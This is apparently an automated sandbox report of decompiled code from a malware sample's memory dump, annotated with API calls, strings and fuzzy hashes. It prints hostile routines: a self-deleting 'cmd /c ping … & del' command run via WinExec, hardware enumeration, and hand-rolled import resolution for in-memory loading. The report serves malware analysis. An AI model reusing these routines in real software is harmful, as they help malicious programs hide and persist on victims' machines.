                                                                                                                                                      			E1001A260() {
                                                                                                                                                      				char _v267;
                                                                                                                                                      				char _v268;
                                                                                                                                                      				char _v531;
                                                                                                                                                      				char _v532;
                                                                                                                                                      				int _t15;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      
                                                                                                                                                      				_v532 = 0;
                                                                                                                                                      				E1000CF20(_t20,  &_v531, 0, 0x103);
                                                                                                                                                      				_v268 = 0;
                                                                                                                                                      				E1000CF20(_t20,  &_v267, 0, 0x103);
                                                                                                                                                      				GetModuleFileNameA(0,  &_v532, 0x104);
                                                                                                                                                      				E1000CC93(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
                                                                                                                                                      				_t15 = WinExec( &_v268, 0); // executed
                                                                                                                                                      				return _t15;
                                                                                                                                                      			}










                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A2BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                      • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                      • API String ID: 2874319085-10483710
                                                                                                                                                      • Opcode ID: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                      • Instruction ID: 1002a94702f99074cc5a7191c0e86848812ee27a6531f1c6c96f6cd2bf050705
                                                                                                                                                      • Opcode Fuzzy Hash: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                      • Instruction Fuzzy Hash: 6EF0AF7988431C6AE720D760DC8AFE9772CAB20700F0005D4F6986A0C1EAF067C88BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E1001A600(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				struct HINSTANCE__* _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				char _v52;
                                                                                                                                                      				char _v53;
                                                                                                                                                      				short _v55;
                                                                                                                                                      				char _v59;
                                                                                                                                                      				char _v63;
                                                                                                                                                      				char _v67;
                                                                                                                                                      				char _v71;
                                                                                                                                                      				char _v72;
                                                                                                                                                      				char _v335;
                                                                                                                                                      				char _v336;
                                                                                                                                                      				signed int _v340;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				intOrPtr _t40;
                                                                                                                                                      				void* _t45;
                                                                                                                                                      				intOrPtr _t73;
                                                                                                                                                      
                                                                                                                                                      				_t80 = __eflags;
                                                                                                                                                      				_t71 = __edi;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022A9E);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t73;
                                                                                                                                                      				_v340 = 0;
                                                                                                                                                      				E10001160( &_v52, __eflags, 0x10024ca1);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v336 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v335, 0, 0x103);
                                                                                                                                                      				GetModuleFileNameA(0,  &_v336, 0x104);
                                                                                                                                                      				_t40 = E1001A170( &_v336); // executed
                                                                                                                                                      				_v24 = _t40;
                                                                                                                                                      				_v72 = 0;
                                                                                                                                                      				_v71 = 0;
                                                                                                                                                      				_v67 = 0;
                                                                                                                                                      				_v63 = 0;
                                                                                                                                                      				_v59 = 0;
                                                                                                                                                      				_v55 = 0;
                                                                                                                                                      				_v53 = 0;
                                                                                                                                                      				E1000CC93(_t71,  &_v72, "%d", _v24);
                                                                                                                                                      				_v20 = E1001A480(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
                                                                                                                                                      				_t81 = _v20;
                                                                                                                                                      				if(_v20 != 0) {
                                                                                                                                                      					E10001A90( &_v52, _t81, _v20);
                                                                                                                                                      					E10001A90( &_v52, _t81, ".exe");
                                                                                                                                                      					_push(_v20);
                                                                                                                                                      					E1000CA30(__ebx, _t71, __esi, _t81);
                                                                                                                                                      				}
                                                                                                                                                      				_t45 = E10001200( &_v52);
                                                                                                                                                      				_t82 = _t45;
                                                                                                                                                      				if(_t45 == 0) {
                                                                                                                                                      					E10001A90( &_v52, _t82, "baidu.exe");
                                                                                                                                                      				}
                                                                                                                                                      				E10001110(_a4, _t82,  &_v52);
                                                                                                                                                      				_v340 = _v340 | 0x00000001;
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				E100011A0( &_v52);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _a4;
                                                                                                                                                      			}























                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001A651
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A170: FindFirstFileA.KERNEL32(1001A679,?), ref: 1001A18E
                                                                                                                                                        • Part of subcall function 1001A170: FindClose.KERNEL32(000000FF), ref: 1001A1B6
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                        • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID: .exe$baidu.exe
                                                                                                                                                      • API String ID: 3164538923-2273953317
                                                                                                                                                      • Opcode ID: eaae4fab46b1e4210e375406be424a6574653a2564e2719a11e71cc4c1965c93
                                                                                                                                                      • Instruction ID: 0ef21a583f90a00b500e35e1eebf572a8ff7ffe47b4923fec59976459a260394
                                                                                                                                                      • Opcode Fuzzy Hash: eaae4fab46b1e4210e375406be424a6574653a2564e2719a11e71cc4c1965c93
                                                                                                                                                      • Instruction Fuzzy Hash: E73169B5C10258ABEB14DFA0ED82FEDB7B4FF09744F000169F50AA7281EB746A44CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 33%
                                                                                                                                                      			E10019960(void* __ebx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				char _v48;
                                                                                                                                                      				char _v312;
                                                                                                                                                      				char _v572;
                                                                                                                                                      				char _v832;
                                                                                                                                                      				char _v1092;
                                                                                                                                                      				char _v1352;
                                                                                                                                                      				char _v1368;
                                                                                                                                                      				char _v1372;
                                                                                                                                                      				intOrPtr _v1376;
                                                                                                                                                      				intOrPtr _v1380;
                                                                                                                                                      				signed int _v1384;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				intOrPtr _t74;
                                                                                                                                                      				intOrPtr _t80;
                                                                                                                                                      				void* _t85;
                                                                                                                                                      				void* _t88;
                                                                                                                                                      				void* _t91;
                                                                                                                                                      				void* _t94;
                                                                                                                                                      				void* _t97;
                                                                                                                                                      				void* _t116;
                                                                                                                                                      				signed int _t150;
                                                                                                                                                      				void* _t164;
                                                                                                                                                      				void* _t168;
                                                                                                                                                      				void* _t171;
                                                                                                                                                      				void* _t174;
                                                                                                                                                      				void* _t177;
                                                                                                                                                      				void* _t180;
                                                                                                                                                      				void* _t182;
                                                                                                                                                      				void* _t183;
                                                                                                                                                      				void* _t184;
                                                                                                                                                      				void* _t185;
                                                                                                                                                      				void* _t186;
                                                                                                                                                      				intOrPtr _t187;
                                                                                                                                                      				void* _t188;
                                                                                                                                                      				void* _t189;
                                                                                                                                                      				void* _t191;
                                                                                                                                                      				void* _t193;
                                                                                                                                                      				void* _t194;
                                                                                                                                                      				void* _t196;
                                                                                                                                                      				void* _t197;
                                                                                                                                                      				void* _t199;
                                                                                                                                                      				void* _t200;
                                                                                                                                                      				void* _t202;
                                                                                                                                                      				void* _t203;
                                                                                                                                                      
                                                                                                                                                      				_t116 = __ebx;
                                                                                                                                                      				 *[fs:0x0] = _t187;
                                                                                                                                                      				_t188 = _t187 - 0x558;
                                                                                                                                                      				_v1384 = 0;
                                                                                                                                                      				_t74 = E10003170( &_v1368, __eflags);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v1376 = 0;
                                                                                                                                                      				_v48 = 0;
                                                                                                                                                      				_v1372 = 0;
                                                                                                                                                      				__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E10022A8C, 0xffffffff); // executed
                                                                                                                                                      				_v1380 = _t74;
                                                                                                                                                      				if(_v1380 != 0xffffffff) {
                                                                                                                                                      					E1000CF20(_t164,  &_v44, 0, 0x1c);
                                                                                                                                                      					_t189 = _t188 + 0xc;
                                                                                                                                                      					_v44 = 0x1c;
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t148 = _v1376;
                                                                                                                                                      						_t80 = _v1380;
                                                                                                                                                      						__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
                                                                                                                                                      						if(_t80 == 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						E1000CF20(_t164,  &_v1352, 0, 0x514);
                                                                                                                                                      						_push( &_v1372);
                                                                                                                                                      						_push( &_v48);
                                                                                                                                                      						_push(0);
                                                                                                                                                      						_t191 = _t189 + 0xc - 0x1c;
                                                                                                                                                      						_t182 =  &_v44;
                                                                                                                                                      						memcpy(_t191, _t182, 7 << 2);
                                                                                                                                                      						_t168 = _t182 + 0xe;
                                                                                                                                                      						_push(_v1380); // executed
                                                                                                                                                      						_t85 = E10019780(_t116, _t182); // executed
                                                                                                                                                      						_t193 = _t191 + 0x38;
                                                                                                                                                      						_t213 = _t85;
                                                                                                                                                      						if(_t85 != 0) {
                                                                                                                                                      							E1000D190(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
                                                                                                                                                      							_push(_v48);
                                                                                                                                                      							E1000CA30(_t116, _t168, _t182, _t213);
                                                                                                                                                      							_t193 = _t193 + 0x10;
                                                                                                                                                      						}
                                                                                                                                                      						_push( &_v1372);
                                                                                                                                                      						_push( &_v48);
                                                                                                                                                      						_push(7);
                                                                                                                                                      						_t194 = _t193 - 0x1c;
                                                                                                                                                      						_t183 =  &_v44;
                                                                                                                                                      						memcpy(_t194, _t183, 7 << 2);
                                                                                                                                                      						_t171 = _t183 + 0xe;
                                                                                                                                                      						_push(_v1380); // executed
                                                                                                                                                      						_t88 = E10019780(_t116, _t183); // executed
                                                                                                                                                      						_t196 = _t194 + 0x38;
                                                                                                                                                      						_t214 = _t88;
                                                                                                                                                      						if(_t88 != 0) {
                                                                                                                                                      							E1000D190(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
                                                                                                                                                      							_push(_v48);
                                                                                                                                                      							E1000CA30(_t116, _t171, _t183, _t214);
                                                                                                                                                      							_t196 = _t196 + 0x10;
                                                                                                                                                      						}
                                                                                                                                                      						_push( &_v1372);
                                                                                                                                                      						_push( &_v48);
                                                                                                                                                      						_push(0x16);
                                                                                                                                                      						_t197 = _t196 - 0x1c;
                                                                                                                                                      						_t184 =  &_v44;
                                                                                                                                                      						memcpy(_t197, _t184, 7 << 2);
                                                                                                                                                      						_t174 = _t184 + 0xe;
                                                                                                                                                      						_push(_v1380); // executed
                                                                                                                                                      						_t91 = E10019780(_t116, _t184); // executed
                                                                                                                                                      						_t199 = _t197 + 0x38;
                                                                                                                                                      						_t215 = _t91;
                                                                                                                                                      						if(_t91 != 0) {
                                                                                                                                                      							E1000D190(_t116, _t174, _t184,  &_v832, _v48, _v1372);
                                                                                                                                                      							_push(_v48);
                                                                                                                                                      							E1000CA30(_t116, _t174, _t184, _t215);
                                                                                                                                                      							_t199 = _t199 + 0x10;
                                                                                                                                                      						}
                                                                                                                                                      						_push( &_v1372);
                                                                                                                                                      						_push( &_v48);
                                                                                                                                                      						_push(0xc);
                                                                                                                                                      						_t200 = _t199 - 0x1c;
                                                                                                                                                      						_t185 =  &_v44;
                                                                                                                                                      						memcpy(_t200, _t185, 7 << 2);
                                                                                                                                                      						_t177 = _t185 + 0xe;
                                                                                                                                                      						_push(_v1380); // executed
                                                                                                                                                      						_t94 = E10019780(_t116, _t185); // executed
                                                                                                                                                      						_t202 = _t200 + 0x38;
                                                                                                                                                      						_t216 = _t94;
                                                                                                                                                      						if(_t94 != 0) {
                                                                                                                                                      							E1000D190(_t116, _t177, _t185,  &_v572, _v48, _v1372);
                                                                                                                                                      							_push(_v48);
                                                                                                                                                      							E1000CA30(_t116, _t177, _t185, _t216);
                                                                                                                                                      							_t202 = _t202 + 0x10;
                                                                                                                                                      						}
                                                                                                                                                      						_push( &_v1372);
                                                                                                                                                      						_push( &_v48);
                                                                                                                                                      						_push(8);
                                                                                                                                                      						_t203 = _t202 - 0x1c;
                                                                                                                                                      						_t186 =  &_v44;
                                                                                                                                                      						memcpy(_t203, _t186, 7 << 2);
                                                                                                                                                      						_t164 = _t186 + 0xe;
                                                                                                                                                      						_push(_v1380); // executed
                                                                                                                                                      						_t97 = E10019780(_t116, _t186); // executed
                                                                                                                                                      						_t189 = _t203 + 0x38;
                                                                                                                                                      						_t217 = _t97;
                                                                                                                                                      						if(_t97 != 0) {
                                                                                                                                                      							E1000D190(_t116, _t164, _t186,  &_v312, _v48, _v1372);
                                                                                                                                                      							_push(_v48);
                                                                                                                                                      							E1000CA30(_t116, _t164, _t186, _t217);
                                                                                                                                                      							_t189 = _t189 + 0x10;
                                                                                                                                                      						}
                                                                                                                                                      						_v1376 = _v1376 + 1;
                                                                                                                                                      						E10003310( &_v1368,  &_v1352, _t217,  &_v1352);
                                                                                                                                                      					}
                                                                                                                                                      					__imp__SetupDiDestroyDeviceInfoList(_v1380); // executed
                                                                                                                                                      				}
                                                                                                                                                      				E100031A0(_a4, _t148, __eflags,  &_v1368);
                                                                                                                                                      				_t150 = _v1384 | 0x00000001;
                                                                                                                                                      				__eflags = _t150;
                                                                                                                                                      				_v1384 = _t150;
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				E10003280( &_v1368); // executed
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _a4;
                                                                                                                                                      			}
                                                                                                                                                      0x10019b9b
                                                                                                                                                      0x10019b9c
                                                                                                                                                      0x10019ba1
                                                                                                                                                      0x10019ba4
                                                                                                                                                      0x10019ba6
                                                                                                                                                      0x10019bba
                                                                                                                                                      0x10019bc5
                                                                                                                                                      0x10019bc6
                                                                                                                                                      0x10019bcb
                                                                                                                                                      0x10019bcb
                                                                                                                                                      0x10019bd7
                                                                                                                                                      0x10019bea
                                                                                                                                                      0x10019bea
                                                                                                                                                      0x10019bfb
                                                                                                                                                      0x10019bfb
                                                                                                                                                      0x10019c0b
                                                                                                                                                      0x10019c16
                                                                                                                                                      0x10019c16
                                                                                                                                                      0x10019c19
                                                                                                                                                      0x10019c1f
                                                                                                                                                      0x10019c2c
                                                                                                                                                      0x10019c37
                                                                                                                                                      0x10019c43

                                                                                                                                                      APIs
                                                                                                                                                      • SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 100199BF
                                                                                                                                                      • _memset.LIBCMT ref: 100199E0
                                                                                                                                                      • SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A01
                                                                                                                                                      • _memset.LIBCMT ref: 10019A1D
                                                                                                                                                        • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                        • Part of subcall function 10019780: GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                        • Part of subcall function 10019780: _memset.LIBCMT ref: 100197DE
                                                                                                                                                        • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      • SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019BFB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3323326763-0
                                                                                                                                                      • Opcode ID: 34e1c9ea5a169ca6ee0ccc6309070e38f518e9ff025555c95e667d819486c7d5
                                                                                                                                                      • Instruction ID: 92146aaf36cf8da670849d236f9b8fe300c912f778ed1f5ba4bfc820bf5b102a
                                                                                                                                                      • Opcode Fuzzy Hash: 34e1c9ea5a169ca6ee0ccc6309070e38f518e9ff025555c95e667d819486c7d5
                                                                                                                                                      • Instruction Fuzzy Hash: 7381B676D006089BDB14DBA4DC51FEFB379EB48311F048198F509B7281EB35AA85CFA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 34%
                                                                                                                                                      			E1001AB60(intOrPtr* _a4) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				intOrPtr* _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				void* _v24;
                                                                                                                                                      				void* _v28;
                                                                                                                                                      				signed int* _v32;
                                                                                                                                                      				void* _v36;
                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				void* _t108;
                                                                                                                                                      				void* _t110;
                                                                                                                                                      				void* _t113;
                                                                                                                                                      				void* _t115;
                                                                                                                                                      				void* _t122;
                                                                                                                                                      				void* _t130;
                                                                                                                                                      				void _t132;
                                                                                                                                                      				void _t137;
                                                                                                                                                      				void* _t144;
                                                                                                                                                      				void* _t159;
                                                                                                                                                      				void* _t194;
                                                                                                                                                      				void* _t201;
                                                                                                                                                      				void* _t202;
                                                                                                                                                      				void* _t203;
                                                                                                                                                      				void* _t204;
                                                                                                                                                      
                                                                                                                                                      				_t2 = _a4 + 4; // 0xe90575c0
                                                                                                                                                      				_v20 =  *_t2;
                                                                                                                                                      				_v16 = 1;
                                                                                                                                                      				_v12 =  *_a4 + 0x80;
                                                                                                                                                      				if( *((intOrPtr*)(_v12 + 4)) != 0) {
                                                                                                                                                      					_v8 = _v20 +  *_v12;
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t108 = IsBadReadPtr(_v8, 0x14);
                                                                                                                                                      						__eflags = _t108;
                                                                                                                                                      						if(_t108 != 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_t110 = _v8;
                                                                                                                                                      						__eflags =  *(_t110 + 0xc);
                                                                                                                                                      						if( *(_t110 + 0xc) == 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_t18 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                      						_t23 = _a4 + 0x24; // 0xf3c7e850, executed
                                                                                                                                                      						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18); // executed
                                                                                                                                                      						_t204 = _t203 + 8;
                                                                                                                                                      						_v36 = _t113;
                                                                                                                                                      						__eflags = _v36;
                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                      							_t28 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                      							_push(4 +  *_t28 * 4);
                                                                                                                                                      							_t32 = _a4 + 8; // 0x98
                                                                                                                                                      							_push( *_t32);
                                                                                                                                                      							_t115 = E1000E018(_t144,  *_t32, _t201, _t202, __eflags);
                                                                                                                                                      							_t203 = _t204 + 8;
                                                                                                                                                      							_v28 = _t115;
                                                                                                                                                      							__eflags = _v28;
                                                                                                                                                      							if(_v28 != 0) {
                                                                                                                                                      								 *(_a4 + 8) = _v28;
                                                                                                                                                      								_t45 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                      								_t47 = _a4 + 8; // 0x98
                                                                                                                                                      								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
                                                                                                                                                      								_t52 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                      								 *(_a4 + 0xc) =  *_t52 + 1;
                                                                                                                                                      								__eflags =  *_v8;
                                                                                                                                                      								if( *_v8 == 0) {
                                                                                                                                                      									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                      									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                      									__eflags = _t122;
                                                                                                                                                      									_v24 = _t122;
                                                                                                                                                      								} else {
                                                                                                                                                      									_v32 = _v20 +  *_v8;
                                                                                                                                                      									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                      								}
                                                                                                                                                      								while(1) {
                                                                                                                                                      									__eflags =  *_v32;
                                                                                                                                                      									if( *_v32 == 0) {
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags =  *_v32 & 0x80000000;
                                                                                                                                                      									if(( *_v32 & 0x80000000) == 0) {
                                                                                                                                                      										_v40 = _v20 +  *_v32;
                                                                                                                                                      										_t88 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                      										_t130 = _v40 + 2;
                                                                                                                                                      										__eflags = _t130;
                                                                                                                                                      										_t92 = _a4 + 0x28; // 0xc483ffff
                                                                                                                                                      										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
                                                                                                                                                      										_t203 = _t203 + 0xc;
                                                                                                                                                      										 *_v24 = _t132;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t78 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                      										_t82 = _a4 + 0x28; // 0xc483ffff
                                                                                                                                                      										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
                                                                                                                                                      										_t203 = _t203 + 0xc;
                                                                                                                                                      										 *_v24 = _t137;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags =  *_v24;
                                                                                                                                                      									if( *_v24 != 0) {
                                                                                                                                                      										_v32 =  &(_v32[1]);
                                                                                                                                                      										_t194 = _v24 + 4;
                                                                                                                                                      										__eflags = _t194;
                                                                                                                                                      										_v24 = _t194;
                                                                                                                                                      										continue;
                                                                                                                                                      									} else {
                                                                                                                                                      										_v16 = 0;
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _v16;
                                                                                                                                                      								if(_v16 != 0) {
                                                                                                                                                      									_t159 = _v8 + 0x14;
                                                                                                                                                      									__eflags = _t159;
                                                                                                                                                      									_v8 = _t159;
                                                                                                                                                      									continue;
                                                                                                                                                      								}
                                                                                                                                                      								_t98 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                      								_t101 = _a4 + 0x2c; // 0x75c08504
                                                                                                                                                      								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
                                                                                                                                                      								SetLastError(0x7f);
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							_t36 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                      							_t39 = _a4 + 0x2c; // 0x75c08504
                                                                                                                                                      							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
                                                                                                                                                      							SetLastError(0xe);
                                                                                                                                                      							_v16 = 0;
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						SetLastError(0x7e);
                                                                                                                                                      						_v16 = 0;
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					return _v16;
                                                                                                                                                      				}
                                                                                                                                                      				return 1;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
                                                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 1001ABF4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4100373531-0
                                                                                                                                                      • Opcode ID: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
                                                                                                                                                      • Instruction ID: ee799e3b8b260964baacb2eb61f61a8d535858b77694984a1748e2a29b669165
                                                                                                                                                      • Opcode Fuzzy Hash: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
                                                                                                                                                      • Instruction Fuzzy Hash: ED81A3B4A00209DFDB04CF94D881AAEB7F1FF89355F248158E819AB351D735EA82CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 16%
                                                                                                                                                      			E1000C9E0(intOrPtr* __eax, void* __edx, void* __edi) {
                                                                                                                                                      				intOrPtr* _t14;
                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                      				intOrPtr _t20;
                                                                                                                                                      				intOrPtr _t36;
                                                                                                                                                      				intOrPtr* _t38;
                                                                                                                                                      
                                                                                                                                                      				 *__eax =  *__eax + __edx;
                                                                                                                                                      				 *0xba =  *0xba + __edx;
                                                                                                                                                      				asm("rol dh, 0x0");
                                                                                                                                                      				asm("adc [edx+edi*4], ah");
                                                                                                                                                      				 *0xba =  *0xba + __edx;
                                                                                                                                                      				 *0x00000178 =  *((intOrPtr*)(0x178)) + __edx;
                                                                                                                                                      				asm("adc dl, al");
                                                                                                                                                      				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
